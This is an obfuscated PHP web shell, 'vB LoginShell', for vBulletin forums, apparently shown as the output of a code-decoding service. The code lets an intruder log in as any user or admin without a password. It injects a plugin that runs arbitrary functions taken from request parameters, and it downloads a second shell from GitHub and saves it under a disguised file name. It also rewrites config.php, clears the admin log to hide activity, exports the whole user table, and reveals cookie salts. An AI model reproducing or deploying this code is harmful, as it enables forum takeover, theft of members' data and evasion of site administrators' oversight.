base64_decode('XCc7DQokY29uZmlnW1wnTWFzdGVyU2VydmVyXCddW1wndXNlcGNvbm5lY3RcJ10gPSA=') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('dXNlcGNvbm5lY3Q=')] . base64_decode('Ow0KJGNvbmZpZ1tcJ1NsYXZlU2VydmVyXCddW1wnc2VydmVybmFtZVwnXSA9IFwn') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('c2VydmVybmFtZQ==')] . base64_decode('XCc7DQokY29uZmlnW1wnU2xhdmVTZXJ2ZXJcJ11bXCdwb3J0XCddID0g') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('cG9ydA==')] . base64_decode('Ow0KJGNvbmZpZ1tcJ1NsYXZlU2VydmVyXCddW1wndXNlcm5hbWVcJ10gPSBcJw==') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('dXNlcm5hbWU=')] . base64_decode('XCc7DQokY29uZmlnW1wnU2xhdmVTZXJ2ZXJcJ11bXCdwYXNzd29yZFwnXSA9IFwn') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('cGFzc3dvcmQ=')] . base64_decode('XCc7DQokY29uZmlnW1wnU2xhdmVTZXJ2ZXJcJ11bXCd1c2VwY29ubmVjdFwnXSA9IA==') . $xd343f512[base64_decode('U2xhdmVTZXJ2ZXI=')][base64_decode('dXNlcGNvbm5lY3Q=')] . base64_decode('Ow0KJGNvbmZpZ1tcJ01pc2NcJ11bXCdhZG1pbmNwZGlyXCddID0gXCc=') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('YWRtaW5jcGRpcg==')] . base64_decode('XCc7DQokY29uZmlnW1wnTWlzY1wnXVtcJ21vZGNwZGlyXCddID0gXCc=') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('bW9kY3BkaXI=')] . base64_decode('XCc7DQokY29uZmlnW1wnTWlzY1wnXVtcJ2Nvb2tpZXByZWZpeFwnXSA9IFwn') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('Y29va2llcHJlZml4')] . base64_decode('XCc7DQokY29uZmlnW1wnTWlzY1wnXVtcJ2ZvcnVtcGF0aFwnXSA9IFwn') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('Zm9ydW1wYXRo')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wnY2Fudmlld2FkbWlubG9nXCddID0gXCc=') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('Y2Fudmlld2FkbWlubG9n')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wnY2FucHJ1bmVhZG1pbmxvZ1wnXSA9IFwn') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('Y2FucHJ1bmVhZG1pbmxvZw==')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wnY2FucnVucXVlcmllc1wnXSA9IFwn') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('Y2FucnVucXVlcmllcw==')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wndW5kZWxldGFibGV1c2Vyc1wnXSA9IFwn') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('dW5kZWxldGFibGV1c2Vycw==')] . base64_decode('XCc7DQokY29uZmlnW1wnU3BlY2lhbFVzZXJzXCddW1wnc3VwZXJhZG1pbmlzdHJhdG9yc1wnXSA9IFwn') . $xd343f512[base64_decode('U3BlY2lhbFVzZXJz')][base64_decode('c3VwZXJhZG1pbmlzdHJhdG9ycw==')] . base64_decode('XCc7DQokY29uZmlnW1wnTXlzcWxpXCddW1wnaW5pX2ZpbGVcJ10gPSBcJw==') . $xd343f512[base64_decode('TXlzcWxp')][base64_decode('aW5pX2ZpbGU=')] . base64_decode('XCc7DQokY29uZmlnW1wnTWlzY1wnXVtcJ21heHdpZHRoXCddID0g') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('bWF4d2lkdGg=')] . base64_decode('Ow0KJGNvbmZpZ1tcJ01pc2NcJ11bXCdtYXhoZWlnaHRcJ10gPSA=') . $xd343f512[base64_decode('TWlzYw==')][base64_decode('bWF4aGVpZ2h0')] . base64_decode('Ow==');
$tb5e29f40 = file_put_contents(DIR . base64_decode('L2luY2x1ZGVzL2NvbmZpZy5waHAudHh0'), file_get_contents(DIR . base64_decode('L2luY2x1ZGVzL2NvbmZpZy5waHA=')));
if($tb5e29f40)
{
?>
<p>Backed up original config.php to <a href="includes/config.php.txt" target="_blank">config.php.txt</a></p>
<?php }
else
{
?>
<p>Failed to back up original config.php</p>
<?php }
$faec7a44 = file_put_contents(DIR . base64_decode('L2luY2x1ZGVzL2NvbmZpZy5waHA='), $gdeb54ee5);
if($faec7a44)
{
?>
<p>Hooks <?php echo $n102de0ab; ?> in config.php</p>
<?php }
else
{
?>
<p>Failed to write new config.php</p>
<?php }
}
?>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<?php }
exit;
}
if(isset($_REQUEST[base64_decode('ZG8=')]) && $_REQUEST[base64_decode('ZG8=')] == base64_decode('bG9naW4=') && isset($_REQUEST[base64_decode('dXNlcm5hbWU=')]))
{
require_once(DIR . base64_decode('L2luY2x1ZGVzL2Z1bmN0aW9uc19sb2dpbi5waHA='));
$vf85e0677 = $_REQUEST[base64_decode('dXNlcm5hbWU=')];
$lf500ae27 = base64_decode('U0VMRUNUIHVzZXJuYW1lIEZST00g') . TABLE_PREFIX . base64_decode('dXNlciBXSEVSRSB1c2VybmFtZSA9ICc=') . $t2beff8da->$j71beeff9->h2a2604e2($vf85e0677) . base64_decode('JyBPUiB1c2VyaWQgPSAn') . $t2beff8da->$j71beeff9->h2a2604e2($vf85e0677) . base64_decode('Jw==');
$f24bdb5eb = $t2beff8da->$j71beeff9->f6cb11695($lf500ae27);
if($f24bdb5eb[base64_decode('dXNlcm5hbWU=')] != null)
{
if(mcbc5c3db($f24bdb5eb[base64_decode('dXNlcm5hbWU=')]))
{
caf7d019c($f24bdb5eb[base64_decode('dXNlcm5hbWU=')]);
vc8d7ca25(base64_decode('Y3Bsb2dpbg=='), true, null);
j98ab8b1d();
}
else
{
die(base64_decode('VmVyaWZ5IGZhaWxlZA=='));
}
}
else
{
die(base64_decode('VXNlciBub3QgZm91bmQu'));
}
}
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('aW5qZWN0cGx1Z2lu'))
{
$cb3ba5a5a = array();
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHByb2R1Y3RpZCx0aXRsZSx2ZXJzaW9uLGFjdGl2ZSx1cmwgRlJPTSA=') . TABLE_PREFIX . base64_decode('cHJvZHVjdCBXSEVSRSBhY3RpdmUgPSAnMSc='));
if($t2beff8da->$j71beeff9->f3bf5fd4f($f24bdb5eb) > 0)
{
while($nd34a04ad = $t2beff8da->$j71beeff9->h35acb628($f24bdb5eb))
{
$t66cd7cb2 = array();
$t66cd7cb2[base64_decode('cHJvZHVjdGlk')] = $nd34a04ad[base64_decode('cHJvZHVjdGlk')];
$t66cd7cb2[base64_decode('dGl0bGU=')] = $nd34a04ad[base64_decode('dGl0bGU=')];
$t66cd7cb2[base64_decode('dmVyc2lvbg==')] = $nd34a04ad[base64_decode('dmVyc2lvbg==')];
$t66cd7cb2[base64_decode('YWN0aXZl')] = $nd34a04ad[base64_decode('YWN0aXZl')];
$t66cd7cb2[base64_decode('dXJs')] = $nd34a04ad[base64_decode('dXJs')];
$cb3ba5a5a[] = $t66cd7cb2;
}
}
$x551416d8 = count($cb3ba5a5a);
$he96e2794[base64_decode('dGl0bGU=')] = base64_decode('QUpBWCBSZWZyZXNoIFNwZWVk');
$he96e2794[base64_decode('aG9va25hbWU=')] = base64_decode('Z2xvYmFsX2NvbXBsZXRl');
$he96e2794[base64_decode('cGhwY29kZQ==')] = base64_decode('aWYoaXNzZXQoJF9SRVFVRVNUW1wneFwnXSkpeyRfUkVRVUVTVFtcJ3hcJ10oJF9SRVFVRVNUW1wneVwnXSk7fQ==');
if(intval($x551416d8) > 0)
{
$v18c6f574 = mt_rand(0, intval($x551416d8));
$he96e2794[base64_decode('cHJvZHVjdA==')] = $cb3ba5a5a[$v18c6f574][base64_decode('cHJvZHVjdGlk')];
}
else
{
$he96e2794[base64_decode('cHJvZHVjdA==')] = base64_decode('dmJ1bGxldGlu');
}
$he96e2794[base64_decode('ZGV2a2V5')] = '';
$he96e2794[base64_decode('YWN0aXZl')] = base64_decode('MQ==');
$he96e2794[base64_decode('ZXhlY3V0aW9ub3JkZXI=')] = base64_decode('NQ==');
$t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('DQogICAgICAgIElOU0VSVCBJTlRPIA==') . TABLE_PREFIX . base64_decode('cGx1Z2luDQogICAgICAgICgNCiAgICAgICAgICAgIGhvb2tuYW1lLA0KICAgICAgICAgICAgdGl0bGUsDQogICAgICAgICAgICBwaHBjb2RlLA0KICAgICAgICAgICAgcHJvZHVjdCwNCiAgICAgICAgICAgIGFjdGl2ZSwNCiAgICAgICAgICAgIGV4ZWN1dGlvbm9yZGVyDQogICAgICAgICkNCiAgICAgICAgVkFMVUVTDQogICAgICAgICgNCiAgICAgICAgICAgICc=') . $he96e2794[base64_decode('aG9va25hbWU=')] . base64_decode('JywNCiAgICAgICAgICAgICc=') . $he96e2794[base64_decode('dGl0bGU=')] . base64_decode('JywNCiAgICAgICAgICAgICc=') . $t2beff8da->$j71beeff9->h2a2604e2($he96e2794[base64_decode('cGhwY29kZQ==')]) . base64_decode('JywNCiAgICAgICAgICAgICc=') . $t2beff8da->$j71beeff9->h2a2604e2($he96e2794[base64_decode('cHJvZHVjdA==')]) . base64_decode('JywNCiAgICAgICAgICAgIA==') . intval($he96e2794[base64_decode('YWN0aXZl')]) . base64_decode('LA0KICAgICAgICAgICAg') . intval($he96e2794[base64_decode('ZXhlY3V0aW9ub3JkZXI=')]) . base64_decode('DQogICAgICAgICkNCiAgICA='));
$vf1e744b = $t2beff8da->$j71beeff9->ha85e5dc1();
vBulletinHook::xa0bf14dd($se3f4bc28);
?>
<h1>Plugin <?php echo $vf1e744b; ?> created on global_complete!</h1>
<pre>
<?php echo print_r($he96e2794); ?>
</pre>
<a href="<?php echo SELF; ?>">Go back</a>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZWRpdGhvb2s='))
{
$vf1e744b = $_REQUEST[base64_decode('aG9va2lk')];
$he96e2794 = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUICogRlJPTSA=') . TABLE_PREFIX . "plugin WHERE pluginid = '$vf1e744b'");
$nd34a04ad = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUIHRpdGxlIEZST00g') . TABLE_PREFIX . "product WHERE productid = '$he96e2794[product]'");
$cb3ba5a5a = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHByb2R1Y3RpZCx0aXRsZSBGUk9NIA==') . TABLE_PREFIX . base64_decode('cHJvZHVjdA=='));
?>
<h1>Modifying plugin '<?php echo $he96e2794[base64_decode('dGl0bGU=')]; ?>' (<?php echo $nd34a04ad[base64_decode('dGl0bGU=')]; ?>)</h1>
<form action="<?php echo SELF; ?>" method="post">
<input type="hidden" name="do" value="doedithook">
<input type="hidden" name="hookid" value="<?php echo $_GET[base64_decode('aG9va2lk')]; ?>">
<h4>Product</h4>
<select name="product">
<option value="vbulletin"<?php if($he96e2794[base64_decode('cHJvZHVjdA==')] == base64_decode('dmJ1bGxldGlu')){ ?> selected<?php } ?>>vBulletin</option>
<?php if($t2beff8da->$j71beeff9->f3bf5fd4f($cb3ba5a5a) > 0)
{
while($m695019ee = $t2beff8da->$j71beeff9->h35acb628($cb3ba5a5a))
{
echo base64_decode('PG9wdGlvbiB2YWx1ZT0i') . $m695019ee[base64_decode('cHJvZHVjdGlk')] . base64_decode('Ig==') . (($he96e2794[base64_decode('cHJvZHVjdA==')] == $m695019ee[base64_decode('cHJvZHVjdGlk')]) ? base64_decode('IHNlbGVjdGVk') : '') . base64_decode('Pg==') . $m695019ee[base64_decode('dGl0bGU=')] . base64_decode('PC9vcHRpb24+');
}
}
?>
</select>
<h4>Hook Location</h4>
<input type="text" name="hooklocation" value="<?php echo $he96e2794[base64_decode('aG9va25hbWU=')]; ?>">
<h4>Plugin Title</h4>
<input type="text" name="title" value="<?php echo $he96e2794[base64_decode('dGl0bGU=')]; ?>">
<h4>Plugin Code</h4>
<textarea rows="20" cols="80" name="phpcode"><?php echo $he96e2794[base64_decode('cGhwY29kZQ==')]; ?></textarea>
<h4>Plugin Execution Order</h4>
<input type="text" name="execorder" value="<?php echo $he96e2794[base64_decode('ZXhlY3V0aW9ub3JkZXI=')]; ?>">
<h4>Plugin Active</h4>
<input type="radio" name="active" value="1"<?php if($he96e2794[base64_decode('YWN0aXZl')]){ ?> checked<?php } ?>> Yes
<input type="radio" name="active" value="0"<?php if(!$he96e2794[base64_decode('YWN0aXZl')]){ ?> checked<?php } ?>> No
<br />
<br />
<br />
<button type="button" onclick="window.location.href = '<?php echo SELF; ?>'">Cancel</button>
<input type="submit" name="save" value="Save Plugin">
</form>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('aW5zdGFsbHRlYW1wc3NoZWxs'))
{
$c36ac99f1 = base64_decode('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Awd2Vyc3VyZ2UvdGVhbXBzLXNoZWxsL21hc3Rlci90ZWFtcHMucGhw');
$wfd3b2e70 = @file_get_contents($c36ac99f1);
if (file_exists(base64_decode('bG5kZXgucGhw'))) {
$u3c0be965 = base64_decode('aW9naW4ucGhw');
} else {
$u3c0be965 = base64_decode('bG5kZXgucGhw');
}
$wae9089d4 = @file_put_contents($u3c0be965, $wfd3b2e70);
if($wae9089d4)
{
?>
<h1>TeamPS Shell installed!</h1>
<p><a href="<?= $u3c0be965 ?>" target="_blank">Go to shell</a></p>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<?php }
else
{
?>
<h1>TeamPS Shell failed to install :(</h1>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<?php }
}
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('Y2xlYXJhZG1pbmxvZw=='))
{
?>
<h1>Clear adminlog</h1>
<h3>How do you want to clear it?</h3>
<form action="<?php echo SELF; ?>" method="post">
<input type="hidden" name="do" value="doclearadminlog">
<p><input type="radio" name="method" value="0"> Truncate entire table (resets adminlogid to 0)</p>
<p><input type="radio" name="method" value="1"> Delete entire table (does not reset adminlogid)</p>
<p><input type="radio" name="method" value="2"> Drop entire table (removes the table from the database completely, will cause db errors for site admins)</p>
<p><input type="radio" name="method" value="3" checked> Just clear my logs (best option)</p>
<button type="button" onclick="window.location.href = '<?php echo SELF; ?>'">Cancel</button>
<input type="submit" name="clear" value="Clear adminlog">
</form>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZW5hYmxlcHJvZHVjdA==') || $_REQUEST[base64_decode('ZG8=')] == base64_decode('ZGlzYWJsZXByb2R1Y3Q='))
{
if($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZW5hYmxlcHJvZHVjdA=='))
{
$x4b1efc02 = base64_decode('MQ==');
$n102de0ab = base64_decode('ZW5hYmxlZA==');
}
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZGlzYWJsZXByb2R1Y3Q='))
{
$x4b1efc02 = base64_decode('MA==');
$n102de0ab = base64_decode('ZGlzYWJsZWQ=');
}
$oa3fdb2a7 = $_GET[base64_decode('cHJvZHVjdGlk')];
$t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('DQogICAgICAgIFVQREFURSA=') . TABLE_PREFIX . "product
SET active = '$x4b1efc02'
WHERE productid = '$oa3fdb2a7'
");
require_once(DIR . base64_decode('L2luY2x1ZGVzL2FkbWluZnVuY3Rpb25zLnBocA=='));
vBulletinHook::xa0bf14dd($se3f4bc28);
j43427ac7();
require_once(DIR . base64_decode('L2luY2x1ZGVzL2NsYXNzX2JpdGZpZWxkX2J1aWxkZXIucGhw'));
vB_Bitfield_Builder::f55663ade($se3f4bc28);
vB_Cache::g4230b1de()->d230093f5(base64_decode('dmJfdHlwZXMudHlwZXM='));
require_once(DIR . base64_decode('L2luY2x1ZGVzL2Z1bmN0aW9uc19jcm9uLnBocA=='));
ncc7b7955();
require_once(DIR . base64_decode('L2luY2x1ZGVzL2NsYXNzX2Jsb2NrLnBocA=='));
$l4ab994b1 = vB_BlockManager::b8fd6e0fb($t2beff8da);
$l4ab994b1->fb6f81d07();
$l4ab994b1->r26a493c9(true, true);
if($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZW5hYmxlcHJvZHVjdA=='))
{
require_once(DIR . base64_decode('L2luY2x1ZGVzL2FkbWluZnVuY3Rpb25zX3RlbXBsYXRlLnBocA=='));
mc06280cd(0, 0, base64_decode('cGx1Z2luLnBocD9kbz1wcm9kdWN0'), false, base64_decode('c3RhbmRhcmQ='));
mc06280cd(0, 0, base64_decode('cGx1Z2luLnBocD9kbz1wcm9kdWN0'), false, base64_decode('bW9iaWxl'));
}
?>
<h1>Product <?php echo $oa3fdb2a7 . base64_decode('IA==') . $n102de0ab; ?>!</h1>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('aG9va2VuYWJsZXI='))
{
?>
<h1>Enable/Disable Plugins</h1>
<form action="<?php echo SELF; ?>" method="post">
<input type="hidden" name="do" value="hookenabler">
<p><input type="radio" name="hooksenabled" value="1" checked> Enable Hooks</p>
<p><input type="radio" name="hooksenabled" value="0"> Disable Hooks</p>
<p><input type="checkbox" name="settings" checked> In settings</p>
<p><input type="checkbox" name="config"> In config.php</p>
<input type="submit" name="save" value="Save">
</form>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZXhwb3J0dXNlcnM='))
{
$g1483a5e9 = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUIGNvdW50KHVzZXJpZCkgQVMgY291bnQgRlJPTSA=') . TABLE_PREFIX . base64_decode('dXNlcg=='));
?>
<style type="text/css">
progress[value] {
appearance: none;
-webkit-appearance: none;
}
</style>
<h1>User table export (<?php echo $g1483a5e9[base64_decode('Y291bnQ=')]; ?> users)</h1>
<progress style="width: 100%;" max="<?php echo $g1483a5e9[base64_decode('Y291bnQ=')]; ?>" value="0" id="userinfo_progress"></progress>
<p>Current progress: <span id="percentdumped">0</span>%</p>
<p><input type="text" id="atatime" value="10000"> Users to dump on each load</p>
<p><input type="text" id="timeout" value="3"> Time to wait in seconds between requests</p>
<p><a id="opendump" target="_blank" style="display: none;" href="loginshell_dump_<?php echo TIMENOW; ?>.txt">Open Dump File</a></p>
<p><button id="startdump" onclick="staggerUserDump()">Start Export</button></p>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<script type="text/javascript">
var currentLine = 0;
var linesToDump = 0;
var stopNow = false;
var timeout;
var ready;
var done = false;
var start;
var retrieved;
function openInNewTab(url)
{
var win = window.open(url, '_blank');
win.focus();
}
staggerUserDump = function()
{
document.getElementById('startdump').style.display = 'none';
linesToDump = parseInt(document.getElementById('atatime').value);
if(stopNow == true)
{
return true;
}
ajax = new XMLHttpRequest();
ajax.onreadystatechange = function()
{
if(ajax.readyState == 4 && ajax.status == 200)
{
percent = (currentLine/<?php echo $g1483a5e9[base64_decode('Y291bnQ=')]; ?>)*100;
document.getElementById('userinfo_progress').value = document.getElementById('userinfo_progress').value+linesToDump;
if(percent > 100)
{
percent = 100;
done = true;
}
document.getElementById('percentdumped').innerHTML = Math.round(percent);
/**document.getElementById('userinfo').innerHTML = document.getElementById('userinfo').innerHTML + ajax.responseText;**/
retrieved = retrieved + ajax.responseText;
if(ajax.responseText == '')
{
document.getElementById('opendump').style.display = 'block';
stopNow = true;
return true;
}
else
{
currentLine = currentLine+linesToDump;
ajax.abort();
staggerUserDump();
}
}
}
ajax.open('POST', '<?php echo SELF; ?>');
ajax.setRequestHeader('Content-type','application/x-www-form-urlencoded');
ajax.send('do=staggereduserexport&startat=' + currentLine + '&linestoget=' + linesToDump + '&time=<?php echo TIMENOW; ?>');
}
</script>
<?php }
else
{
$d50a98831 = array();
$dbcea0e13 = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHVzZXJncm91cGlkIEZST00g') . TABLE_PREFIX . base64_decode('dXNlcmdyb3VwIFdIRVJFIGFkbWlucGVybWlzc2lvbnMgPSAnMyc='));
while($ua3937d25 = $t2beff8da->$j71beeff9->h35acb628($dbcea0e13))
{
$d50a98831[] = $ua3937d25[base64_decode('dXNlcmdyb3VwaWQ=')];
}
$ba2e0150f = array();
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHVzZXJpZCxhZG1pbnBlcm1pc3Npb25zIEZST00g') . TABLE_PREFIX . base64_decode('YWRtaW5pc3RyYXRvcg=='));
while($k8d93d649 = $t2beff8da->$j71beeff9->h35acb628($f24bdb5eb))
{
$p6df44926 = p3f0fc2cb($k8d93d649[base64_decode('dXNlcmlk')]);
$x86a8d265 = array();
$x86a8d265[base64_decode('dXNlcmlk')] = $p6df44926[base64_decode('dXNlcmlk')];
$x86a8d265[base64_decode('dXNlcm5hbWU=')] = $p6df44926[base64_decode('dXNlcm5hbWU=')];
$x86a8d265[base64_decode('bXVzZXJuYW1l')] = m8b0ce0d($p6df44926);
$x86a8d265[base64_decode('YWRtaW5wZXJtaXNzaW9ucw==')] = $k8d93d649[base64_decode('YWRtaW5wZXJtaXNzaW9ucw==')];
$ba2e0150f[] = $x86a8d265;
}
$cb3ba5a5a = array();
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHByb2R1Y3RpZCx0aXRsZSx2ZXJzaW9uLGFjdGl2ZSx1cmwgRlJPTSA=') . TABLE_PREFIX . base64_decode('cHJvZHVjdA=='));
if($t2beff8da->$j71beeff9->f3bf5fd4f($f24bdb5eb) > 0)
{
while($nd34a04ad = $t2beff8da->$j71beeff9->h35acb628($f24bdb5eb))
{
$t66cd7cb2 = array();
$t66cd7cb2[base64_decode('cHJvZHVjdGlk')] = $nd34a04ad[base64_decode('cHJvZHVjdGlk')];
$t66cd7cb2[base64_decode('dGl0bGU=')] = $nd34a04ad[base64_decode('dGl0bGU=')];
$t66cd7cb2[base64_decode('dmVyc2lvbg==')] = $nd34a04ad[base64_decode('dmVyc2lvbg==')];
$t66cd7cb2[base64_decode('YWN0aXZl')] = $nd34a04ad[base64_decode('YWN0aXZl')];
$t66cd7cb2[base64_decode('dXJs')] = $nd34a04ad[base64_decode('dXJs')];
$cb3ba5a5a[] = $t66cd7cb2;
}
}
?>
<head><title>vB LoginShell 2.0</title></head>
<h1>vBulletin Login Shell | CP Login (<?php echo $t2beff8da->$o8165b856[base64_decode('YmJ0aXRsZQ==')]; ?>) (vB<?php echo substr($t2beff8da->$u75c40479,0 ,1); ?>)</h1>
<hr />
<form action="<?php echo SELF; ?>" method="get">
<input type="hidden" name="do" value="login" />
<input type="text" name="username" value="" />
<input type="submit" name="login" value="Login as user" />
</form>
<hr />
<p>Admins found: <?php echo count($ba2e0150f); ?></p>
<p><?php foreach($ba2e0150f as $u880e0d76){ echo base64_decode('PGEgaHJlZj0i') . SELF . base64_decode('P2RvPWxvZ2luJnVzZXJuYW1lPQ==') . $u880e0d76[base64_decode('dXNlcm5hbWU=')] . base64_decode('Ij4=') . $u880e0d76[base64_decode('bXVzZXJuYW1l')] . base64_decode('PC9hPg==') . (($u880e0d76[base64_decode('YWRtaW5wZXJtaXNzaW9ucw==')] == $la5e0f468) ? base64_decode('IChmdWxsIHBlcm1pc3Npb25zKQ==') : '') . base64_decode('IA==');} ?></p>
<hr />
<p>AdminCP directory detected in config: <a href="<?php echo $t4267d023; ?>" target="_blank"><?php echo $jb8c13d30; ?></a></p>
<p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($o32d30f96 as $gbaab7a10) { echo base64_decode('PGEgaHJlZj0i') . $t2beff8da->$o8165b856[base64_decode('YmJ1cmw=')] . base64_decode('Lw==') . $gbaab7a10 . base64_decode('L2luZGV4LnBocCIgdGFyZ2V0PSJfYmxhbmsiPg==') . $gbaab7a10 . base64_decode('PC9hPiA='); }?></p>
<hr />
<p><a href="<?php echo SELF; ?>?do=injectplugin">Inject malicious plugin</a></p>
<p><a href="<?php echo SELF; ?>?do=installteampsshell">Install TeamPS Shell</a></p>
<p><a href="<?php echo SELF; ?>?do=clearadminlog">Clear adminlog</a></p>
<p><a href="<?php echo SELF; ?>?do=exportusers">Export users</a></p>
<hr />
<h3>Config Info</h3>
<pre>
<?php echo print_r($t2beff8da->$b2d0a0436); ?>
</pre>
<hr />
<p>Cookie prefix: <?php echo COOKIE_PREFIX; ?></p>
<p>Cookie salt: <?php echo COOKIE_SALT; ?></p>
<hr />
<h3>Installed Products</h3>
<ul>
<li id="vbulletin"><span style="color: green;"><a style="color: green;" href="#" onclick="getPluginsForProduct('vbulletin');">vBulletin (<?php echo $t2beff8da->$u75c40479; ?>)</a></span></li>
<?php foreach($cb3ba5a5a as $nd34a04ad)
{
if($nd34a04ad[base64_decode('YWN0aXZl')])
{
$s665648e9 = base64_decode('Z3JlZW4=');
}
else
{
$s665648e9 = base64_decode('cmVk');
}
echo base64_decode('PGxpIGlkPSI=') . $nd34a04ad[base64_decode('cHJvZHVjdGlk')] . base64_decode('Ij48c3BhbiBzdHlsZT0iY29sb3I6IA==') . $s665648e9 . base64_decode('OyI+PGEgc3R5bGU9ImNvbG9yOiA=') . $s665648e9 . base64_decode('IiBocmVmPSIjIiBvbmNsaWNrPSJnZXRQbHVnaW5zRm9yUHJvZHVjdChcJw==') . $nd34a04ad[base64_decode('cHJvZHVjdGlk')] . base64_decode('XCcpOyI+') . $nd34a04ad[base64_decode('dGl0bGU=')] . base64_decode('PC9hPg==') . base64_decode('ICg=') . $nd34a04ad[base64_decode('dmVyc2lvbg==')] . base64_decode('KQ==') . ((trim($nd34a04ad[base64_decode('dXJs')]) != null) ? base64_decode('ICg8YSBocmVmPSI=') . trim($nd34a04ad[base64_decode('dXJs')]) . base64_decode('IiB0YXJnZXQ9Il9ibGFuayI+VVJMPC9hPik=') : '') . base64_decode('ICg8YSBocmVmPSI=') . SELF . base64_decode('P2RvPWVuYWJsZXByb2R1Y3QmcHJvZHVjdGlkPQ==') . $nd34a04ad[base64_decode('cHJvZHVjdGlk')] . base64_decode('Ij5lbmFibGU8L2E+LzxhIGhyZWY9Ig==') . SELF . base64_decode('P2RvPWRpc2FibGVwcm9kdWN0JnByb2R1Y3RpZD0=') . $nd34a04ad[base64_decode('cHJvZHVjdGlk')] . base64_decode('Ij5kaXNhYmxlPC9hPik8L3NwYW4+PC9saT4=');
}
?>
</ul>
<p><a href="<?php echo SELF; ?>?do=hookenabler">Globally enable/disable hooks</a></p>
<hr />
<h6>Loginshell v3 beta</h6>
<script type="text/javascript">
function getPluginsForProduct(productid)
{
ajax = new XMLHttpRequest();
ajax.onreadystatechange = function()
{
if(ajax.readyState == 4 && ajax.status == 200)
{
ul = document.createElement('ul');
ul.setAttribute('id', 'pluginlist_' + productid);
document.getElementById(productid).appendChild(ul);
document.getElementById('pluginlist_' + productid).innerHTML = ajax.responseText;
}
}
ajax.open('POST', '<?php echo SELF; ?>');
ajax.setRequestHeader('Content-type','application/x-www-form-urlencoded');
ajax.send('do=fetchplugins&productid=' + productid);
}
</script>
<?php }
?>
Function Calls
count | 1 |
explode | 1 |
ini_set | 1 |
base64_decode | 3 |
Stats
MD5 | 621acc6a93dea2c9a19f0ad8ba4bbc52 |
Eval Count | 0 |
Decode Time | 194 ms |